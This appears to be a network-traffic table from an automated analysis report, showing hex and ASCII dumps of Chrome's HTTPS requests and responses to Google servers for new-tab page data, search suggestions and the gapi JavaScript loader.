2025-03-15 07:29:33 UTC	87	IN	Data Raw: 62 66 31 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 68 69 63 61 67 6f 20 62 65 61 72 73 22 2c 22 74 68 65 20 63 6f 6e 6e 65 72 73 20 73 65 61 73 6f 6e 20 37 22 2c 22 62 6c 6f 6f 64 20 6d 6f 6f 6e 20 74 6f 74 61 6c 20 6c 75 6e 61 72 20 65 63 6c 69 70 73 65 20 74 Data Ascii: bf1)]}'["",["chicago bears","the conners season 7","blood moon total lunar eclipse t
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 6f 6e 69 67 68 74 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 63 6f 6e 73 6f 6c 65 22 2c 22 73 74 20 6c 6f 75 69 73 20 6d 69 73 73 6f 75 72 69 20 74 6f 72 6e 61 64 6f 20 77 61 72 6e 69 6e 67 22 2c 22 6e 65 74 66 6c 69 78 20 62 6c 61 63 6b 20 6d 69 72 72 6f 72 20 73 65 61 73 6f 6e 20 37 22 2c 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 63 68 65 63 6b 65 64 20 62 61 67 67 61 67 65 20 66 65 65 73 22 2c 22 64 65 6e 76 65 72 20 6e 75 67 67 65 74 73 20 6c 61 6b 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a Data Ascii: onight","nintendo switch 2 console","st louis missouri tornado warning","netflix black mirror season 7","southwest airlines checked baggage fees","denver nuggets lakers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 62 6b 78 51 5a 32 4a 6d 62 69 73 30 4d 7a 46 75 54 57 56 69 52 7a 5a 52 4e 31 70 4b 63 6a 4d 31 5a 45 74 73 62 33 6f 30 64 56 56 4a 62 48 6c 34 63 32 4e 6a 63 55 35 43 5a 45 39 48 64 45 78 53 54 6a 4e 42 61 55 78 50 4d 6d 70 6b 55 6a 4e 50 53 45 64 52 53 6d 64 78 54 46 67 34 4e 7a 4a 4c 65 57 55 79 59 7a 68 6e 55 45 68 5a 51 6b 31 42 65 45 55 78 55 79 39 7a 4e 47 4e 50 53 56 64 33 57 6d 39 42 64 56 51 78 64 6b 6b 33 61 45 4a 75 52 47 39 48 51 32 70 57 4d 33 64 53 55 56 5a 55 61 55 4a 69 55 57 30 76 5a 30 6f 76 62 7a 68 57 5a 6b 6c 6c 56 57 6b 33 52 57 64 78 5a 6a 52 4e 65 6c 41 72 61 6c 52 5a 51 30 6c 31 63 47 4e 59 4d 6b 78 61 4d 45 49 72 4b 33 4a 36 63 56 6c 4f 5a 6e 51 72 61 47 34 72 61 6c 6c 4f 52 30 4a 57 55 30 6c 31 4d 6b 68 49 52 6c 42 36 57 48 64 Data Ascii: bkxQZ2Jmbis0MzFuTWViRzZRN1pKcjM1ZEtsb3o0dVVJbHl4c2NjcU5CZE9HdExSTjNBaUxPMmpkUjNPSEdRSmdxTFg4NzJLeWUyYzhnUEhZQk1BeEUxUy9zNGNPSVd3Wm9BdVQxdkk3aEJuRG9HQ2pWM3dSUVZUaUJiUW0vZ0ovbzhWZkllVWk3RWdxZjRNelAralRZQ0l1cGNYMkxaMEIrK3J6cVlOZnQraG4rallOR0JWU0l1MkhIRlB6WHd
2025-03-15 07:29:33 UTC	197	IN	Data Raw: 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: 362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["ENTITY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
2025-03-15 07:29:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	142.250.186.68	443	7432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:32 UTC	359	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	142.250.186.68	443	7432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:32 UTC	496	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjI3M4BCIrgzgEIruTOAQiL5c4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-15 07:29:33 UTC	1055	IN	HTTP/1.1 200 OK Version: 735763701 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 15 Mar 2025 07:29:33 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-15 07:29:33 UTC	335	IN	Data Raw: 32 36 32 36 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 32 64 20 67 62 5f 50 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2626)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 64 20 67 62 5f 70 64 20 67 62 5f 48 64 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 Data Ascii: d gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u0
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c Data Ascii: e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div\u003e\u003c\/div\u003e\
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 Data Ascii: bindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 Data Ascii: -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 Data Ascii: -label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700335,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthi
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 41 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 7a 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 42 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b Data Ascii: a.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ad\u003dfunction(a){return new _.zd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Bd\u003dglobalThis.trustedTypes;
2025-03-15 07:29:33 UTC	1099	IN	Data Raw: 65 77 20 5f 2e 4f 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4f 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 52 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 43 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 43 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b Data Ascii: ew _.Od(b?b.createScriptURL(a):a)};_.Qd\u003dfunction(a){if(a instanceof _.Od)return a.i;throw Error(\"H\");};_.Sd\u003dfunction(a){if(Rd.test(a))return a};_.Td\u003dfunction(a){if(a instanceof _.Cd)if(a instanceof _.Cd)a\u003da.i;else throw Error(\"H\");
2025-03-15 07:29:33 UTC	376	IN	Data Raw: 31 37 31 0d 0a 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 64 65 2c 68 65 2c 24 64 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 24 64 28 5f 2e 61 65 28 61 29 29 3a 5a 64 7c 7c 28 5a 64 5c 75 30 30 33 64 6e 65 77 20 24 64 29 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 Data Ascii: 171/?#]\|$))/i;var de,he,$d;_.be\u003dfunction(a){return a?new $d(_.ae(a)):Zd\|\|(Zd\u003dnew $d)};_.ce\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db\|\|document;c.getElementsByClass
2025-03-15 07:29:33 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 76 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 Data Ascii: 8000a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.ee\u003dfunction(a,b){_.vb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	142.250.186.68	443	7432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:32 UTC	393	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-15 07:29:33 UTC	970	IN	HTTP/1.1 200 OK Version: 735763701 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 15 Mar 2025 07:29:33 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-15 07:29:33 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-03-15 07:29:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49759	142.250.185.142	443	7432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:36 UTC	754	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-15 07:29:36 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117390 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Tue, 11 Mar 2025 08:24:00 GMT Expires: Wed, 11 Mar 2026 08:24:00 GMT Cache-Control: public, max-age=31536000 Last-Modified: Sat, 08 Feb 2025 15:09:17 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 342336 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-15 07:29:36 UTC	474	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 61 61 2c 65 61 2c 6c 61 2c 6f 61 2c 79 61 2c 42 61 2c 43 61 3b 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var aa,ea,la,oa,ya,Ba,Ca;aa=function(a){var
